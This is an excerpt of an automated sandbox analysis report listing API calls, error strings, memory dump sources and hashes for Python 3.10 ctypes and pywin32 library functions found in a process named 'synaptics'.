                                                                                                                                                                                                              • class must define a '_type_' attribute which must be a string of length 1, xrefs: 6C0A3493
                                                                                                                                                                                                              • __ctype_be__, xrefs: 6C0A3731, 6C0A3754
                                                                                                                                                                                                              • class must define a '_type_' string attribute, xrefs: 6C0A3811
                                                                                                                                                                                                              • class must define a '_type_' attribute, xrefs: 6C0A3453
                                                                                                                                                                                                              • __ctype_le__, xrefs: 6C0A373D, 6C0A3746
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$AttrErr_LookupObject_SizeStringUnicode_
                                                                                                                                                                                                              • String ID: 0bal$__ctype_be__$__ctype_le__$_type_ '%s' not supported$cbBhHiIlLdfuzZqQPXOv?g$class must define a '_type_' attribute$class must define a '_type_' attribute which must bea single character string containing one of '%s'.$class must define a '_type_' attribute which must be a string of length 1$class must define a '_type_' string attribute
                                                                                                                                                                                                              • API String ID: 1020937358-3586928373
                                                                                                                                                                                                              • Opcode ID: 0706c5163baef2ccbe901f97391b7c6b3906ef999cc469979b071896a54bbca3
                                                                                                                                                                                                              • Instruction ID: c78d0c35015c23f07135082f6e41240dfef3ca0a31718c48627bba324754e6c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0706c5163baef2ccbe901f97391b7c6b3906ef999cc469979b071896a54bbca3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DED1D5B0E082459FCB04CFE9D844B9E7BF4BF0A32CF044265E859A7A42D732D916CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(00000000,6C0B67AC,?), ref: 6C0A2801
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA434,class must define a '_length_' attribute), ref: 6C0A282B
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A2B47
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A2B52
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _type_ must have storage info, xrefs: 6C0A2954
                                                                                                                                                                                                              • array too large, xrefs: 6C0A2A55
                                                                                                                                                                                                              • 0bal, xrefs: 6C0A298E, 6C0A2A0E
                                                                                                                                                                                                              • The '_length_' attribute must not be negative, xrefs: 6C0A288C
                                                                                                                                                                                                              • class must define a '_length_' attribute, xrefs: 6C0A281F
                                                                                                                                                                                                              • The '_length_' attribute must be an integer, xrefs: 6C0A2855
                                                                                                                                                                                                              • The '_length_' attribute is too large, xrefs: 6C0A28EC
                                                                                                                                                                                                              • class must define a '_type_' attribute, xrefs: 6C0A2922
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$AttrErr_LookupObject_String
                                                                                                                                                                                                              • String ID: 0bal$The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                                                                                                                                                                              • API String ID: 1754608734-3756850988
                                                                                                                                                                                                              • Opcode ID: 305fa057b5044be1d62bb47c65b28541e8b597be9b6a74d5b79c0ca2a068dc7a
                                                                                                                                                                                                              • Instruction ID: 417ad2db60fc9e0d08d660f7aac4f689cdb711c1c9c3de55dffbf4014286f164
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305fa057b5044be1d62bb47c65b28541e8b597be9b6a74d5b79c0ca2a068dc7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB1E5B0A042019BCB08CFE9C988B9977F4FF0672CF144675E819ABA52DB32D916CB55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,?), ref: 6BF484AD
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,timetuple), ref: 6BF484C8
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF484D7
                                                                                                                                                                                                              • PyObject_CallObject.PYTHON310(00000000,00000000), ref: 6BF484E2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF484F3
                                                                                                                                                                                                              • PyNumber_Check.PYTHON310(00000000), ref: 6BF48507
                                                                                                                                                                                                              • PyNumber_Long.PYTHON310(00000000), ref: 6BF48515
                                                                                                                                                                                                              • PyLong_AsLong.PYTHON310(00000000), ref: 6BF48529
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF48537
                                                                                                                                                                                                              • PyErr_BadArgument.PYTHON310 ref: 6BF48541
                                                                                                                                                                                                              • ?PyWinTimeObject_Fromtime_t@@YAPAU_object@@_J@Z.PYWINTYPES310(00000000), ref: 6BF4854C
                                                                                                                                                                                                                • Part of subcall function 6BF48AB0: Py_BuildValue.PYTHON310((i),00000000,00000000,6BF48551,00000000), ref: 6BF48ABA
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF48568
                                                                                                                                                                                                              • PySequence_Check.PYTHON310(00000000), ref: 6BF48572
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310 ref: 6BF4858C
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(00000000,iiiiiiiii|i,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF485EC
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF48650
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,year out of range,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF48670
                                                                                                                                                                                                              • _mktime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 6BF48695
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9D44,mktime argument out of range,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF486B3
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310((d)), ref: 6BF48705
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6BF4873A
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,Objects of type '%s' can not be used as a time object,?), ref: 6BF48753
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4876C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$Dealloc$Object_String$BuildCheckLongNumber_Sequence_TupleValue$Arg_ArgumentAttrCallClearFormatFromtime_t@@Long_ObjectOccurredParseSubtypeTimeType_U_object@@__mktime64
                                                                                                                                                                                                              • String ID: (d)$Objects of type '%s' can not be used as a time object$iiiiiiiii|i$mktime argument out of range$timetuple$year out of range
                                                                                                                                                                                                              • API String ID: 2680833096-3179837657
                                                                                                                                                                                                              • Opcode ID: a8a1015e20c2e895de3ad0685f87f6572d77cab32330bd8960a7b64f42ae47c1
                                                                                                                                                                                                              • Instruction ID: 884b4beeec46ea73ece17f3031848afb75ff00dcebd4fcec1e64b9ed58fbfddb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8a1015e20c2e895de3ad0685f87f6572d77cab32330bd8960a7b64f42ae47c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A781E6728142019BD705EF28D845B5B7BF8EF56724F000A6DF85693262E739E9188BD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyIndex_Check.PYTHON310(?), ref: 6C0A778D
                                                                                                                                                                                                              • PyNumber_AsSsize_t.PYTHON310(?,6C7EA174), ref: 6C0A77A2
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A77B2
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A780F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,slice start is required for step < 0), ref: 6C0A783F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,slice step cannot be zero), ref: 6C0A7861
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,slice stop is required), ref: 6C0A78B1
                                                                                                                                                                                                              • PyNumber_AsSsize_t.PYTHON310(?,6C7E9C54), ref: 6C0A78C6
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A78D6
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(6C0B1367,00000000), ref: 6C0A795C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • slice start is required for step < 0, xrefs: 6C0A7838
                                                                                                                                                                                                              • Pointer indices must be integer, xrefs: 6C0A7AE1
                                                                                                                                                                                                              • 0bal, xrefs: 6C0A7995
                                                                                                                                                                                                              • slice step cannot be zero, xrefs: 6C0A785A
                                                                                                                                                                                                              • slice stop is required, xrefs: 6C0A78AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$String$Occurred$Number_Ssize_t$Bytes_CheckFromIndex_Size
                                                                                                                                                                                                              • String ID: 0bal$Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                                                              • API String ID: 1849767016-4174081377
                                                                                                                                                                                                              • Opcode ID: 2da7ceeb032b6066ac8267a8a2424565054a4735ac5c94a7c684ddebdb558092
                                                                                                                                                                                                              • Instruction ID: 545dfdcbfea85f5e4b894e1461a236a22cf4635451070367386b3817003c249b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da7ceeb032b6066ac8267a8a2424565054a4735ac5c94a7c684ddebdb558092
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41B11272B041049BCB04CFEDD984A99B7F4EF86329B1482A6ED0EC7611EB32D916C794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetExplicitEntriesFromAclW.ADVAPI32(?,00000000,?), ref: 6BF421F4
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(GetExplicitEntriesFromAcl,00000000), ref: 6BF42204
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000), ref: 6BF42215
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildDecodeEntriesErrorError@@ExplicitFormatFromLastMessageSizeTuple_U_object@@Unicode_Value_Win_
                                                                                                                                                                                                              • String ID: AccessMode$AccessPermissions$GetExplicitEntriesFromAcl$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                              • API String ID: 1470591405-3224252679
                                                                                                                                                                                                              • Opcode ID: be3ec1ade40b0ebdd92b47a7bf018ee0ac9dbb4b3b6cbeb1ef7b1723ecf186c2
                                                                                                                                                                                                              • Instruction ID: a0a71f803a001e5812d3fe361ba27b005a0063bf94e15fb0f47e7609ef2ffad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be3ec1ade40b0ebdd92b47a7bf018ee0ac9dbb4b3b6cbeb1ef7b1723ecf186c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA51B076524200AFEB04EF18DC44F7ABFB4EB55705F0440A8F90992237D73ADA69CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,Array length must be >= 0, not %zd,?), ref: 6C0A1D27
                                                                                                                                                                                                              • PyDict_New.PYTHON310 ref: 6C0A6BAF
                                                                                                                                                                                                              • PyLong_FromSsize_t.PYTHON310(?), ref: 6C0A6BC3
                                                                                                                                                                                                              • PyTuple_Pack.PYTHON310(00000002,?,00000000), ref: 6C0A6BDA
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A6BF1
                                                                                                                                                                                                              • PyDict_GetItemWithError.PYTHON310(00000000), ref: 6C0A6C05
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A6C43
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocDict_$Err_ErrorFormatFromItemLong_PackSsize_tTuple_With
                                                                                                                                                                                                              • String ID: %.200s_Array_%ld$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                                                                                                                                                                              • API String ID: 576596397-2378283101
                                                                                                                                                                                                              • Opcode ID: 33525861d03e52ae177c47f11a2110023a5d4de8583b2d47b4f91318a4270bf7
                                                                                                                                                                                                              • Instruction ID: 6bb422b07cfc791b3031c6c94a41757a737157368cc0f0f5c7c9fc25ce9e87f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33525861d03e52ae177c47f11a2110023a5d4de8583b2d47b4f91318a4270bf7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA8114B0A04205ABCF10DFE8CD81BD973F8EF05358F1046A4E859D6682DB72E986CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EB154,AddAuditAccessObjectAce not supported by this version of Windows), ref: 6BF43064
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,lllOOOii:AddAuditAccessObjectAce,?,?,?,?,?,?,?,?), ref: 6BF430AD
                                                                                                                                                                                                              • ?PyWinObject_AsIID@@YAHPAU_object@@PAU_GUID@@@Z.PYWINTYPES310(?,?), ref: 6BF430CD
                                                                                                                                                                                                              • ?PyWinObject_AsIID@@YAHPAU_object@@PAU_GUID@@@Z.PYWINTYPES310(?,?), ref: 6BF430F4
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF4311D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s: adding ACE would put ACL over size limit, xrefs: 6BF431B9
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF43116
                                                                                                                                                                                                              • PyACL::AddAuditAccessObjectAce, xrefs: 6BF431B4
                                                                                                                                                                                                              • lllOOOii:AddAuditAccessObjectAce, xrefs: 6BF430A7
                                                                                                                                                                                                              • AddAuditAccessObjectAce, xrefs: 6BF43175, 6BF43298
                                                                                                                                                                                                              • AddAuditAccessObjectAce not supported by this version of Windows, xrefs: 6BF4305D
                                                                                                                                                                                                              • AddAuditAccessObjectAce: unable to allocated %d bytes, xrefs: 6BF431F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@@@Err_Object_U_object@@$Arg_FormatParseStringTuple
                                                                                                                                                                                                              • String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessObjectAce$AddAuditAccessObjectAce not supported by this version of Windows$AddAuditAccessObjectAce: unable to allocated %d bytes$PyACL::AddAuditAccessObjectAce$The object is not a PySID object$lllOOOii:AddAuditAccessObjectAce
                                                                                                                                                                                                              • API String ID: 1881464081-1609464327
                                                                                                                                                                                                              • Opcode ID: 012f4de60d2937ef902da6ee4356b4900ab76304d5508e3a031d3cc81e9d8179
                                                                                                                                                                                                              • Instruction ID: 908fe8ca119b8353889d19183c01fffe999c857d0a4b5399e6160e2d964fc78a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 012f4de60d2937ef902da6ee4356b4900ab76304d5508e3a031d3cc81e9d8179
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B71A133614200AFD704EF64D88596FBBF9EF85219F40056EF94982172DB35D928CBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,_fields_,00000000,00000000,?,?,?,?,?,6C0ADBB5,?,?), ref: 6C0AD879
                                                                                                                                                                                                              • PySequence_Fast.PYTHON310(00000000,_fields_ must be a sequence,?,?,?,?,?,?,6C0ADBB5,?,?), ref: 6C0AD892
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,6C0ADBB5,?,?), ref: 6C0AD8A9
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,OO|O,?,?,?,?,?,?,?,?,?,?,?,6C0ADBB5,?,?), ref: 6C0AD8EE
                                                                                                                                                                                                              • PyObject_GetAttr.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0ADBB5), ref: 6C0AD908
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0AD952
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0ADBB5), ref: 6C0AD96C
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6010,00000000,00000000), ref: 6C0AD9A6
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,6C0B6010,00000000,00000000,00000000), ref: 6C0AD9BD
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA0C
                                                                                                                                                                                                              • PyObject_SetAttr.PYTHON310(?,?,00000000), ref: 6C0ADA20
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA3A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA5D
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA68
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA83
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADA96
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,unexpected type), ref: 6C0ADAB1
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0ADAC0
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0ADBB5,?), ref: 6C0ADACB
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,?,6C0ADBB5,?,?), ref: 6C0ADAE0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Object_$Attr$String$Arg_CallCheckErr_FastFunctionMakeParseResultSequence_State_ThreadTuple
                                                                                                                                                                                                              • String ID: 04Ul$OO|O$_fields_$_fields_ must be a sequence$unexpected type
                                                                                                                                                                                                              • API String ID: 3084966660-279794170
                                                                                                                                                                                                              • Opcode ID: 9b9c01eae4f5f674ddbc5fa605cd4d20a134088d3b67079a22fc625ad36e4ef6
                                                                                                                                                                                                              • Instruction ID: 6d5a97980ab498211509bf45127b13d8048524c1663e8011d3f247d563f82070
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b9c01eae4f5f674ddbc5fa605cd4d20a134088d3b67079a22fc625ad36e4ef6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D81D0B0A046019BCB04CFE8DC81B9A73F4EF05738F140719ED6AA76D2DB31E9168B95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,O|O,?,?), ref: 6C0A507B
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310(?), ref: 6C0A509C
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(00000000,O&O;illegal func_spec argument,Function_00004FD0,?,?), ref: 6C0A50C3
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.dlsym,6C0B112C,?,?), ref: 6C0A50EB
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,_handle), ref: 6C0A5100
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A511C
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,the _handle attribute of the second argument must be an integer), ref: 6C0A5146
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A515E
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A516D
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310(00000000), ref: 6C0A517C
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A5194
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A5199
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,could not convert the _handle attribute to a pointer), ref: 6C0A51AF
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A5204
                                                                                                                                                                                                                • Part of subcall function 6C0A4C50: PyEval_SaveThread.PYTHON310 ref: 6C0A4C6D
                                                                                                                                                                                                                • Part of subcall function 6C0A4C50: GetProcAddress.KERNEL32 ref: 6C0A4C77
                                                                                                                                                                                                                • Part of subcall function 6C0A4C50: PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A4C80
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EA434,function ordinal %d not found,?), ref: 6C0A51F2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A525A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A527F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ctypes.dlsym, xrefs: 6C0A50E6
                                                                                                                                                                                                              • _handle, xrefs: 6C0A50F8
                                                                                                                                                                                                              • O&O;illegal func_spec argument, xrefs: 6C0A50BD
                                                                                                                                                                                                              • could not convert the _handle attribute to a pointer, xrefs: 6C0A51A8
                                                                                                                                                                                                              • function '%s' not found, xrefs: 6C0A51DB
                                                                                                                                                                                                              • O|O, xrefs: 6C0A5072
                                                                                                                                                                                                              • function ordinal %d not found, xrefs: 6C0A51E6
                                                                                                                                                                                                              • the _handle attribute of the second argument must be an integer, xrefs: 6C0A513F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
